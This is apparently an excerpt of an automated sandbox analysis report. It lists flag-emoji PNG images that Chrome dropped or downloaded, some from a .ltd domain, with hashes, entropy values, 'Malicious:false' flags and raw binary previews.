                                  Preview:.PNG........IHDR.....................PLTEGpLv...=bm.w.Aah.s.=bs.}.=bh.s...'.7.U..=cu..:.I.4Zk.u.Ch.......h".?no.y:.Gv...=bm.w.?ds.}y...:`s.~j.t.?dr.|.@ex..i.t.7\Z.eB.N.........................................................................................................................................................................s....o..{.....v....Z.ne.uq..v........p.{^..e.s].mi.uW.i...P.cD.Zj.uI.^\.k@.W?.VP.bC.X`..>.U=.T>.U[.iD.Xd.o;.RN._:.PA.V8.OF..7.N0.IU.cZ.fJ.Z5.L3.J<.P2.H'.AG.W/.FM....DH.W:.M,.C*.@..98.J(.?,.AG.T&.<'.=-.A&..#.:%....1%..$.:$..!.8$..*.>!.."..../ .6!....5%|...4.}...2..1..+.{.,.=..0 x...0.y.../.w."t..y..u...$.t...-.s..p..u..q.'~7.p..o.....k..m...*.h..j..e..k..h..f..f..y%.w(.d.._..a..c..a..[..`..`..^..]..W..Z..j".Y..S..e .T..R..Nz.P..Ir.K..Fl.I}.Eu.Ai.Aq.=f.9a.5[. .2...*tRNS.....%/8ETccbbelrvw~~~............................IDATx...Mo$.}..o=t.4.C.Z..KN..Y.:..[.... .\....._....\r..{NF...$99."........pf....]]`....2.......?...j0...k...<#p.n....#p
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4787
                                  Entropy (8bit):7.942972356299022
                                  Encrypted:false
                                  SSDEEP:96:spYoqmlL93hTHdk9f+e+8ZzUD+wIQFU+dbRJZaVK+RSIZU91:eDj3hjdkAKdmIAFVRJvIZA
                                  MD5:478DC44DBC2913670DB99226A735BDCB
                                  SHA1:F68D353EF65AED964A2A79E4174538FF5B1D8196
                                  SHA-256:5FFAE5C9C245C9476F19CB20C0631249AF433FC41A05897A31312524A2AD0185
                                  SHA-512:B438B80212ACEE1E88CC87E228753C8604E35E5E2E96FFA7090F42D115C18C167662CBB56382106FEF6D303776CBA7774E5F74678E9E386693953CD3C0B132F0
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLIw....4dy......9i.6f|.....6f|7g|...O..F}....6f|r.....5e{8u.Q.....3dy...g..<l./^t.....:j.2aw...0`v=n.......<l./^t.....1awj..................................:.....8.....8.......7....8..)..8..8..7..6.....6..Q..5.....4.....1...............y..y..w..x.....w..}..u..q..v.......6v..s..s..y..u..r..i.....q..s..z..p..o...Oq....f..n.....n...+x..l...p...l..k..k..a..v..i..j..o...m..i..{....h..g..f...e..{..e..n..Z]..f..c..c...b..c...`..o.......b.._..x....c..a..^..q...0].._..i..`.....\..[..`..[..s..\..Z..g..{..Y..^..Y..Y..V..h..W..r..X..\..U..V..T..U..]..S..U..S..S..m..\..R..S..Q..Q..Q....P..U..b..K...0M..U..M..I..L..R..H..K..O..}}~F..N....-J..B..H..A..D~..r'lmn;z.Bw.8v.8t.?q.bce:o.:k.n`+4j.5g}1dzVVV/`v-]sWM&JJM?>986.++*&&&$$$..!.....#....."....bn....+tRNS.....%$13:APTccdemwv~......................4tX....7IDATx..O.%.u..{.U.O...{$Y.8....v..l..dc.8..vb9.F...N.$.`C.!YXx"l.0!!....&........XA.bI#.f..3=...W.....+....e.5..uwuuwU.W.w.z
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):6835
                                  Entropy (8bit):7.959001207355746
                                  Encrypted:false
                                  SSDEEP:192:m5siqTAZJiWgBPjecsROTh6S1y+SN9s1KD:m53/iW6ecIOTd1yZQe
                                  MD5:BC44F3015A905A5B2577D8C51C73809F
                                  SHA1:13FC88B73A8C9263C20FF094EEC9A46D462EDDD2
                                  SHA-256:47514B817C6DA3FC2F56A2F0A451032D31ABB7345B26C29FDFE3A5C4FECB2EAE
                                  SHA-512:C6A5E60E06F8F2E59DB3FB22441E262133CC4805F08FDB26FEEC55CFAF237ADA05383243124AF1E9553A952B159DE72CE01DA11315E60CD0E973EEE77A5105DA
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL1]|b...>`\...=^g...<^<q.g...V..<^Dx.e...@jc...=^j..<n..>_^..j...:\b...>`k...@b]...5WAe~...........................................]...........m........................D.................y.................D........................h..........x..........?..........w..T.....?...}.|h...|!....sn.m.....o._..Q....~.t6]...b.s..Q..D...i!.zp"..yxxS..A...W,5..$..E...Y.hv..b+".....I|.xi.^}ZA}.%..6..,...UXsmj$..".....t\.qq7_mx ..2y.;v."}.'{..F..|..~.bfi.z.)s..w.h`\.y..N..u.6l..t..q..s..q..t..q..m.kH..p..p..+.V[`.o..n..m..l..6/.m..j.+d..k.t1..j.@[n=h2.g..j..i.VTS.h..e..i..h..g..a..f..d..e..d.BS^._..a..c.+Wu.b..[..a.`9v.`..`..].._.._.FKM.^..]..W..]..Z..[..U..W.0W".W.0I[.Qz.T..NrAAB.R..O..Mz.Il...:E..Is.Fh.J|.?U.Cd.Gw.Em.J.Y..)7D.@d.BnL*..?i.;_.6Y.>..0Q.#.B8......tRNS....%-:FU`cemx~...............CJ9....DIDATx..{|T..?.y.sf&g&.IB.....EP@.[)E~...Z..V...n.n......k+v.b.].zA.x.EQW)....\.Z...Bb.&7&3..s.s....\.5-....;..k.9....>. O.<y...'O.<
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4990
                                  Entropy (8bit):7.92489056994011
                                  Encrypted:false
                                  SSDEEP:96:6T6nWKwY0VJ5ecuUSY4k94LK8HsVr9JItfkr/yRezilmsbgWZPRr:6TWOVbecZS+iTH+r/Ie/FkgWZPp
                                  MD5:9100FBDB185864315F6558D56DCA626D
                                  SHA1:DF973A54D814FF5941278FA88A60FE363F05AFEE
                                  SHA-256:4087D399E0F1528B7D21E56DC64E61A9368B14A7747F952B51E8B6C12F139A02
                                  SHA-512:E63F67846862E49533CA1C38879B0AB5675B936A25C2AEA4DA76A89ABF1FAA3A94EBE5640728816BF668817581EEF2D9EDA5C14B5F5D578D360CE25C3FBC99D6
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ed-1f1f7.png
                                  Preview:.PNG........IHDR.....................PLTEGpL..=.jk..<.ff..=.op..=.EF.pq....!#..M.56..?.gh...z....?.)*.kl.qr..>.DD.fg..>.op..=.oq..@..8.cd.7X....................................................................................................................................................r.....>.............m..........<....h...z{..].........ps.......jj.t}.......^].gl+....3.qr.t.._aM...lm...gh.VXf.h.fh.abQ...HGpy.....Z[.TU.JL.v&.\].LNpqz.VW.3..DF.OPcj..@B.63tqC....FG2w..79.;<.KL.bD.57|d+Xa..35.AC.:<.45./0.'$.12../.()./1dWf.+-.59MW..)*....!#.-..&'.6< `..#$....&(. "."$.. ...7L..#%.............#&:C~_3m.............!#............R3;...23{...'5.'4....%2....$1."0.C#e...!.~#.v.3..,|.*z.*o.(w{...'f.&w.$s.'..#^."i.!q..p..m..U..a..k..H..iE....f..X..M..n..c..C..a.._..X..^..Q..>..I.._..@..6..Sz......!tRNS....#/9EU^ccblrt~~.................Q`....IDATx...}l.w}...........;.b'q.4..ki.J.]..V4J.0...h.S.X76i.._..$&&..m*..R.....*...m)...D..$$q.7ql.}O.......;....].....d.w~.....w..f```
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4376
                                  Entropy (8bit):7.883311280912297
                                  Encrypted:false
                                  SSDEEP:96:Qyp6stiAF/3qFCRZt56lcyQQbMOwMTGWIFlik+4HRozX:dZJF/RZgdZwIOin46zX
                                  MD5:169E9B640F35F58B07B84D8DF798D576
                                  SHA1:E25780EAC5D5702735B82ADC6CD0B2B68562DB4A
                                  SHA-256:13A95284DA99A4D86775BA3DB2FCF5B4876ED338434B11E8D2D6FF27C539419D
                                  SHA-512:8A067666F08648E732B7FF58BFB8C97F5BA7170599EE4C77429EBE1F736C0C030FA52D93E326C1030C56169156E0CC3DCDF18BD7AEA2AD40E6F5CA6585984AB6
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLe`T^YN.{.{..Cknx..C^l..j"..?ao..{.j#..Ddr.]k..,^.{.i"..?*?p..:`o..'S..G`n..k#.{bq...><Kuft..k#_m..y..?.{ft..j#..@_m..z.j#ds...A.{.z.z]l..i"..=y..3Ep..L..J..I..H..G..G..F..F..F..E..E..?..E..=..>..E..E..>..E..D..7..D..C..6..D..C..B..K..F..5..?..@..B..O..=..B..>..R..>..X..B..>..B..=..\..P..B..<..b.?.[.@.e.<.@.x.j.r.=.l.;.:.9.6.9..5..5..0../..1../.~..w)gu..r*_n..l2.l#[j.Ue.wd0Qa.J^.K\.k[/AX.EW.cU.?S.=Q.=P~8P.YM,8L{5L.1L.0H~OF+*E."B.'B.(@{E>*.=.)<i.<..;..:..9z.9..8..7..7..6..5w.5..5.84'.4..3..3}.2..2}.1y.1v.1|.0p.0z.0..0|./s./x./../h./z..z0-&.-g.-y.-w.,v.,x.,].+j.+p.+v.*_.*u.*t.)[.)r)(&.(t.'l.'r.'s&&&.&].&o.&q.%o.%m.$H.$d.$p"##.$l.#n.#l."Q."l.!j.!k. #. b. j..\..V..j..g..i..h..#..a..F..P..\..#..N..S..A..!..K..G..D..=..!..9..!.. ........!.....tRNS........%%17:@KR]cdddlnq~~................................................................................................................j.F....=IDATx.....U..........A.P...l.)..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):3918
                                  Entropy (8bit):7.886558210975162
                                  Encrypted:false
                                  SSDEEP:96:w62kBGV6cHorpPL82baW0cprmwKITBIXWAszt6Ga7Co:Z2kckcCp4kaW/pbKfWACt6Ga3
                                  MD5:59CA130A55E5FA6A09C381C516CD6F37
                                  SHA1:EBF8A6AA91E927B3FD68E3D131F843A7E1EC0E43
                                  SHA-256:7E4B6953D3324AE3C23871ABE7FFDDF5483824C5FFF3825D91136F9E86542B6C
                                  SHA-512:F3C4076423131F889AF1CC0431F5DE234AF3735CF14DCAC3D6590C2F098C723A5E08B196DB6EA545543BF903B90D41431EEBEA544D28AD15FAF5CF1A5CC680A1
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1f1.png
                                  Preview:.PNG........IHDR.....................PLTEGpLv...=bm.w.Aah.s.=bs.}.=bh.s...'.7.U..=cu..:.I.4Zk.u.Ch.......h".?no.y:.Gv...=bm.w.?ds.}y...:`s.~j.t.?dr.|.@ex..i.t.7\Z.eB.N.........................................................................................................................................................................s....o..{.....v....Z.ne.uq..v........p.{^..e.s].mi.uW.i...P.cD.Zj.uI.^\.k@.W?.VP.bC.X`..>.U=.T>.U[.iD.Xd.o;.RN._:.PA.V8.OF..7.N0.IU.cZ.fJ.Z5.L3.J<.P2.H'.AG.W/.FM....DH.W:.M,.C*.@..98.J(.?,.AG.T&.<'.=-.A&..#.:%....1%..$.:$..!.8$..*.>!.."..../ .6!....5%|...4.}...2..1..+.{.,.=..0 x...0.y.../.w."t..y..u...$.t...-.s..p..u..q.'~7.p..o.....k..m...*.h..j..e..k..h..f..f..y%.w(.d.._..a..c..a..[..`..`..^..]..W..Z..j".Y..S..e .T..R..Nz.P..Ir.K..Fl.I}.Eu.Ai.Aq.=f.9a.5[. .2...*tRNS.....%/8ETccbbelrvw~~~............................IDATx...Mo$.}..o=t.4.C.Z..KN..Y.:..[.... .\....._....\r..{NF...$99."........pf....]]`....2.......?...j0...k...<#p.n....#p
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4810
                                  Entropy (8bit):7.8936223085104595
                                  Encrypted:false
                                  SSDEEP:96:SAXQuM6O/Mw9U4T6EJic1uKm7+D5FOC3SHPPADVP9Auok1:SAXG1/Mb4TT/1NnovYd9Au71
                                  MD5:0B9F5AC1DA62944E66D41A28AF430594
                                  SHA1:5CF75D8F81C6CF947F64720510CB26500DB9B055
                                  SHA-256:31D1C6376B2C146BD0894C757ECBA0B3EB43B996028A9B3BB269F2D170DD82C5
                                  SHA-512:BF0FB5D180879233E95B9586DDF23EA44C433B7B63631B1C911CE039B0DD2039E41597FB1AECC97B298D5D5A3326121E07FEC48DBA3597ADF610B76EEB508439
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.......F$l.x...QjZu.{.G%s.~...k...F#}|}...f.|...gtm.E"......W.m....O".J vvv...e.{.E!hslg.}......G%b.x...i...D!qqq......c.y.G$...i.~...uuu.......@.Y.n...5uP...............................................................................................................................................................................................................................xx...{...jj.....q...h.~.]]...a.x...].tU.q.NNI.j{{{O.kV.m=.cttt.>>A.bM.f2.[..[%.V2.Y..V$.U%.T%.S;.Z..W#.R".Q.//B.N+.R .NYtH#.O..Quf>..M._<..N.T8..L..O..K..K.&&..J.&&..I.9,.A/ff<..H.$$.J2..'..I.."..G."".. ..F..I.!!..E.$!..D.....C... }G..B.....C...|Q,..=..@..@..?.....>..;. ...=....~=.y?.};.qA.|:.{9.z8.y8....w6.o9.v5.t4.s3.r2....q0.p1.e6.n/.k/.i,.f-.Z0.a*.P,.U).Y&.M).J%.O!.K .D..?...?:....tRNS.......',56<AHS`ccbdlm~~~.........................................................................................................................j.jy....IDATx...1n$E......j...W.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):3940
                                  Entropy (8bit):7.916267176919574
                                  Encrypted:false
                                  SSDEEP:96:HvD1kj//CPhExqT4K5G8DjGQG1RC3r2gBkhunMU7mnkajhn:PDK/c0nkqQG1AxMU7kjhn
                                  MD5:4AD293A96E9C3C75DE74BBA2A68EDB64
                                  SHA1:05FBA1CEC987958592F736E6E530E2157821C1C4
                                  SHA-256:9FE01B95AD18EA8A2316374891D21A77718B01490F7470FC76E20DBFEC3AB405
                                  SHA-512:D06C500A6F85AB453241BB0D380CB6B51A2DC69FB9675F60CEE8706BBBD30109018573153263B8BDD61C482BB6134C5CE93B854EF3E0FA04F10DA620CE9394EB
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f7-1f1fa.png
                                  Preview:.PNG........IHDR.....................PLTEGpLk .......g.....k.....j.....i.......BY..-&.7u...j.....j.....w..."l. ^.........j.....j.....k .g........k........l!..........f..a..............................................................................................................................................................................................................u..i.._|..H0.K?.F2.J?.I=.H=.I>.F;.KM.F<.D9Ho..B7.B7.;%.C9.?4.@5.HT.=2.Lf.@7.<1.:/.8-.2..<3;c.yNx.6+.4)^T..5+.2'.5*.92.0%.5+..#BT..6..,!.-".'..7H.:T.*..-#&W./T.%V..3/.)..1)$U..-#.'.#T.YCy.'..V..X."R..$..$../)>H. P..$.0J..O.$N..T..)!..&.M..L.."..P.y-E.J..+%.I..!..H..!..F.~)#.$..J..E..D..B..A.u'!...X,Q.C..@.}!..?....B/er$..>..>..<..3t.>..<.p ..:.}..w...8..7v.8.i...6..0..6..5..4.k...3..2..1..0....b......,..*z!.J.'o.!.."b. _..dg.7K...,tRNS.....%%56=MTcccdffwv~~~~............................IDATx..K..V...s...~.......)(...l..E.E..?.5?.6,..(RXD(.v...E.h2.dz^.]o..C.....fj.L.._...v...s.=n::::::::::::::::::...|q.$)8.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4145
                                  Entropy (8bit):7.880975234082769
                                  Encrypted:false
                                  SSDEEP:96:mlB33Jz+uEvp/kDlsymIu6cqc97xNHiOJBpbqk+vOSpk:mlZop/q83qcHIOJBt0Rpk
                                  MD5:1CA1F352550D602D48A64C1378B6D540
                                  SHA1:C2530372AF592A0DBB5140DEF40FAB79BE85D7BA
                                  SHA-256:E4201ACC2E841D0145D35178A61579C1C3D7C86C68715893C0ACAF7E82D8FB08
                                  SHA-512:6038FC80021D41BFFFFC8369D3983164E018C44BBD383FB48EB9DF07AFAB816E243333F15EC5221B4A94983C3160AF887BF18AF2B765738883D72D644A4837F3
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ea-1f1ea.png
                                  Preview:.PNG........IHDR.....................PLTEGpL...}.....lv.}..ruyz..|||t.....|..zzz{..Wt.~~~......w..8[.......ttt|..z..vvv......:Pn!Cp...?^.x..rrr......Up.wwww.....www......v..www}.....Kh....uuu...t............................................................................................................................................................................}.....^..y..r.....l..s.....Y..t..e..i..r.....V.._..W..n..g..Z....\..V..V..V..^..U..N..j..T..~~~S..c..V..L..Q..\..{{{P..S..a~.N..J..[~.L..wwwS}.F~.L}.J}.I|.Wy.H{.sssIz.A{.Ox.Xv.Fx.Dw.Dv.Ls.Ft.Bt.@s.:s.Aq.?q.On.<p.hhhAo.=o.<n.@l.:l.9l.Fh.8j.=i.7i.6h.4g.5f.3e.2d.;b.\\\1c.0b.@_./`.3^.-\.7Y.-Z.5X.9Uz*U.LLL)P.0Nt&M.4Id"Es!Bo<<<'>^,9J.2O+/3&&&.';%%%$$$###"""!!! .......!........../...............................................................%cp.....tRNS.......%158>IRUWccccceekyy|~~~~.....................................................................................................................YuGY...LIDATx.....6.@.C^R..2i.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5605
                                  Entropy (8bit):7.9458577511476625
                                  Encrypted:false
                                  SSDEEP:96:HgHxbq0OMHXMHamgRJWoGmuurv+wcv7C14UxPSVvqryMixBsus:AZXOIYMRJfGgev7IPSVvzNxBsB
                                  MD5:2770C03FCC42EEFFE061CB0E4C7F128E
                                  SHA1:9CE5EE94F505B3A8C0461B5F8854635E5592BEC2
                                  SHA-256:D8721BEC3A35C4230110929803B476EB8775D08B91003A3C4F9B791E0711D715
                                  SHA-512:8D6C3C74C18AE3A66D00B13C4198711B99EBBA5455A909068ABD0C6FFE6744185BE606AB48F01E19551D51753C89766832B40BE962ACAF52906DB8CC7F21C549
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e7-1f1ee.png
                                  Preview:.PNG........IHDR.....................PLTEGpLh...g!).8...'~6.f!.nu.v|sssh..h...rx.pxi..h...iqh...qy....qwh..h..h...rz.ltv6<uuu...............l.#sss.go...xyx.......b..fn...tttvvvmXZ.t%.......3D.3C..0..6.....6(.?...#.9+.B..4..4.,=.....1..?..0...$.:...2.I-.D.1B%.<./@..4/.F.......(9....1A...!1.......+<.&7.......$5...q.#......).>...............&.>(.?...$.;.x&!.7!.8.f ../4.K.....*,.?../..-*.A..1..0'.7'}7,.A....*:~.&0.G.+;*.<8.O....5E.lt.7G.k!....=L.DS..'./?..........R^....#6.)8.KX.dl.!,..,....Ze.........*."-a....).gp.. .(5.DP....qy.......MV.&3.cm.NZ.j"."1...r..........%.\e.7D.Xa._i%{5.........xyy............@J..-.......=K*.;.....7.Wb.."~....0.,C...'.@.....5A.....'....U.c{...n.y......oL....v.!.:P.c..u.b......F.X,.@..b.s.........U9......1D..8.....}.]j...Y.Vz.O.ht8.I..<....\....`.Q|YyIOr?-..Oc.../tRNS..~c.c~c....1..o...bBQ7....d}..n.......H~....c.i.n...eIDATx...k.Q..q.Wt. 6C.....Y...@."t..C..JB..S[:t...A1..b..Tr..%`P...#.p[q)i.@)tq).J.....^.$....}.......=.....p8.....p8....4
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):6234
                                  Entropy (8bit):7.94825987093765
                                  Encrypted:false
                                  SSDEEP:96:hyMA790r7NrAIowBCcj8NmBJZomhTSTKrowxZ1zxLE4HFyIksCDvzotNbfAJEuIr:NNrAlwBCcpJZtvoCs6vUzoTfSUMwcW
                                  MD5:DEAA5EC14FB2BB323B1D0E5C4669854D
                                  SHA1:EF463C0265F7DD0E1394F49298ED64D8E1DFB5CD
                                  SHA-256:4F46A96C10AD22CB8BF870EEE898D38124E54E12E83C7DCA448067261D57F7A6
                                  SHA-512:5672CC61AB8C7D055F04ACDE8F50CBD0AB832AA30A4CC4D203F87A1CD65AAD608DA4C683979F6E495AF32548F9695E9FB0A77C984F1DBB343AD85B060B1799B8
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1eb-1f1ef.png
                                  Preview:.PNG........IHDR.....................PLTEGpL"k.f..._se...^rp...]qk......k..Zop...Tj.KJ.i...9......k..&cv.Yn.Ujn...eyg......_s....\pg|.p...uy.auq..gr.._s.Xm.pr.YX_........G9........................................,.................)..K...0...0...../...tt8../...-........-.....-.....*..).....'(.....*..%...dc...$.."..... ......................NN.........vw..}".lo!...=?twr.............DD.e%L~yhi..;?.......-1....00......un!.36.....7.%%......_fea]..+1.}..C?.,2...sb.....w..|.. #WT.....n.;nI.02.p....<bw.u.SQ}.......$+aV ..!ZPP.n..h}.......j..Y..e|...gL..,,GF.....aw.. ,Y6w5)...?>.....[q.......C..UjO?....76t+7.......*+w....6.:/..@.$${..._....u..p.*...i.....`..j..`..V..M..D..8c..:..V.. ..Q...RQ...9...UU ........6..........+..:.....E...........)....j.....J.. ..L.........dd..........xy...........q...,tRNS....$68LXcbhj{~~~~..................................IDATx...;K....q.%D.b+.E,(........E... H......E..;..-...y.y..n.m.Z..i:....~w.....B.!..B.!..B.b. )....E..b..<.....X..k...G...I
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5238
                                  Entropy (8bit):7.866528732478047
                                  Encrypted:false
                                  SSDEEP:96:hvamI+1iyiPsGErggdQapZDMC91HMG10AhPiifSb51jjpRuougGr46XAKwz9NRtl:ZamdpiPsGE0gBzDMC9aG104SV1np0cCU
                                  MD5:A5291D8CD7869D5F421671BE8FFE7D24
                                  SHA1:46B976B9BACEDCB108E670BF12816A40A1CF5DEE
                                  SHA-256:3DC9C35CCB175C0905D85154656921BB5D055B654040B630B8DE03F12D47384D
                                  SHA-512:3C19DB3EC1C9A7A124624693D55AC5E72CACAD29C154CB7BB4651FAF7A45EA1D4A16821A2BF05BB7CEE6D9FFA0052F22C03C4257584BFAE26C0F26DFC4369D12
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f5-1f1f7.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.6E|9J.jx^.$.`o].".ky_. .gv.?Q.....0.n|Z.".bqa.!..=.et.p~`.!\Ha.ky`. .cr_. .o~*.$.etf.%`.!U...jy[..g.'.o~.ap[..........................................................................................................................................................................y..o.....v.z...f~.m}.`x.jy.Yr.eu.`qg|..[n.bq.Mh.Ti.]l.Vi.Md.Od.Vf.C_.F`.K^.O`.E\.?Z.9VPi..FZ.*G.>V.,K.7S.3Q./O.*J..M.-M.<S..M.+K.6P.1M.+K.?Q.)I.+I.&G.$FaOm.'G./J.5T.%E.(E..G.#C<W...?.!Az:e.%A.!@..>./C..=..:.$?..;..:..2..:..5..8I@o.":..6..1.Ju..8..4..3..4. 7..5..1$F}..1..4..,"Dz../.I...2..- Bx.....,..1.@v..*'>`..'..)06f{.1..(..,.=t..'.<rh.E.;q..'s.+.9pS!L.. .7nz.'k.)..%.3[....5li.&.3j9#Rz.!.2h&'YI.C.0gc.!..dk...,b.*`.(N^...(].&\.&b.%[.$YX..?.).#X.!T..Z..N..E..T..=..;..4..L;m......tRNS.....%48KTUccdgsx~................................................................................................................................................................p
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4355
                                  Entropy (8bit):7.917351966132968
                                  Encrypted:false
                                  SSDEEP:96:8PeWOd8GUwmgSDii81pEzFU3dKO671z2/GyGlhb66gS:+ws2i87qU3dpK1zqKhxgS
                                  MD5:AB2E719957932F73B8A4A92876907E55
                                  SHA1:FB3CA669B0AD9F424471266744CD53707B876FFA
                                  SHA-256:CFE9CE93133478FAB9BCA95352F60A0606236EAF4CAA1F1F6804D8075C935066
                                  SHA-512:BB90D3E65D13CCE2CC7F8C0224CC6AE8A318506D153145333B8543782F40C6304B06C3A4054B5C86363AA99D167EBB919F70698DB50270219AD9522AE823A02B
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.74tg%ug%....w.......~.}.}..|..u|.....{j&vi'uh&wj'}f+ns96zSi..l..r..q..r..l.~q..p...{W.-*a.z[.u6{Tu# v:$v&$w&#z)'w'$x(&{+(.A3q3%n......u.\/..D..G..H..K..K..N..O..Q..R..S..U..W..X..Y..Z..[..\..]..^.._..`..a..a..b..b.63.74.;7.?;.B=.C=.@<.=8.;6.94.61.50.5/.3..2-.0+.1,.p*.t+.y-yl're".)0.@..Y..Y..\.fP.5@.wS.?M.V..b[.}O.xC.q:.k..d..a.B?.;6..+..c.3/.>;.EA.JD.MH.QL.SN.UP.VQ.SO.QL.NK.MI.KF.ID.GB.D?.A<.>9.;6.94.40.=9.A<.@<O.pD.h9.eB.nP.ug...X.FOR.l?.d2.[*.VG._;.[.WR$qE..I.{@.u;.Y,.Q*{)&..P..L..M..N..V..[..a..I.9..>.<o..." .(%.-*..).0+..*.d?.18.C..W..^..h..k..q..p.?.A.N.N.A..;..5..1..9..>..U..R..R..\U.e..hv.d.._..c .k7.j6.i3.g1.f1.d..b-.a,._).]*.]&.Z&.Y$.W".V!.U .T..S..Q..P..O..N..N..L..K..I..H..G..E..D.~A.w<.l7._0.\..B.z..y.c.h._s....a..ni..\.|...K...1tRNS.c.....mT:.$0v...]F.......;c.......Ig.........~;.......IDATx...{\....q;..7..6.)...J...v.H.Pa(....a...f:L.+.....0!..-.%!.9.*..c....{....{......}.7......s}....}................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):6598
                                  Entropy (8bit):7.960008401909168
                                  Encrypted:false
                                  SSDEEP:192:wAmjV9324eAjik84cNleaLUJvZoZNLdXeuq4j9hH:CjVZ25Aq4a1rpBhH
                                  MD5:C9DB88F751644DB18B2D3BB13B6F6776
                                  SHA1:72EDD5A6CE03F73F8515D5E5AC7BC250C8C10B1C
                                  SHA-256:21F81E34BD90175CC7D8E808DD6DE9FE8E5BD0B2F7EF3E86575E0AB9CA7BE1BF
                                  SHA-512:15E0898735A292ACA5A2C5EC926DE56C5B34313F3DA197394849FCB4A70999DDEF1C925012048E63742DEE472BECA5A2D1B2D8E0E8E4696F47B582D69152FB49
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.S>.us*"..a.vw0$.y.zu-%.sq)!.A7.y.;)w.&.e..Y..}E.u.Z.u-%.{v.%..pt-#.|.sw/&.vx0'.}o&...o..C..............................................................F..M.........?..N.....L..>..K.X.......N..I.X....b..G.F..4.i.B....C....P.@._.>.}.A.m.4....<....v.@.R....:.b.9.s.H.7.......&.5.q.f.3.W.D....3....1..P./.<....g....M.-........\.;.+...+.*.)....(..t..@.....Z.'.h....gV.iW.%.gW.bP....eT.fV..E..%..y....eU..{.cS.`N.cT..].ZH._O..".o:~..._P.wq.YL.~#.[K.|x....XH.{;.kd.SA._U.ZL.zU.UE.r..u .RB}xs.bY.WE.K9.P?.PB.O?.M=.gbouy.OA.L=.SF.m".XN.K;.H8.L=.>-.mA.H8.M?ule.[S.F6.A0.g..O@.K>.E5.C4.F8.B3.c..A2.@0.E8.H<.?0.NB.9(.UO.=/.@1.G<ga\.@3.:-.B7.>2.1#|W..@5.IC.7*`SN.<3.8,.)..8..2'lB3.6-.)..0&}2)RD=.*!y.&u( ...m$.9)%..H....#tRNS...."&,5=ET^cgiy~~.......................RIDATx...y\SW.....t....L_m..}..HHB.!.DH....2j..L......(A-F..j@ .e.AA........`....".R.....s.....V..#?R...|....'7...9s..3g.9s..3g.9s
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4149
                                  Entropy (8bit):7.906373375121343
                                  Encrypted:false
                                  SSDEEP:96:MEa4y87X3KTz37hMuEuLnPgYLN9mxTHXFOlO2tZODgD901Ir/zH:Ry87X3KvkunPYVOlXZODgR0m/zH
                                  MD5:1D5DF4ECC178D233C5EE2E0416EC29B9
                                  SHA1:831432A57F4982C31E916F6D5BEE6899BBA8F910
                                  SHA-256:CA037CFCB33D6E41BA0B19D76C0A791F0BACCB8FE2FCDFA8DB5F5814C49FF1BF
                                  SHA-512:F5B94AA5382711999BE43665D061272A0F8F210482D591F37FE0BBA6E3CDB2BCF6842C121C09EADCF6ED3DCA305B86B48018E6E9C2B6BA961C7DCA2F16795994
                                  Malicious:false
                                  Reputation:low
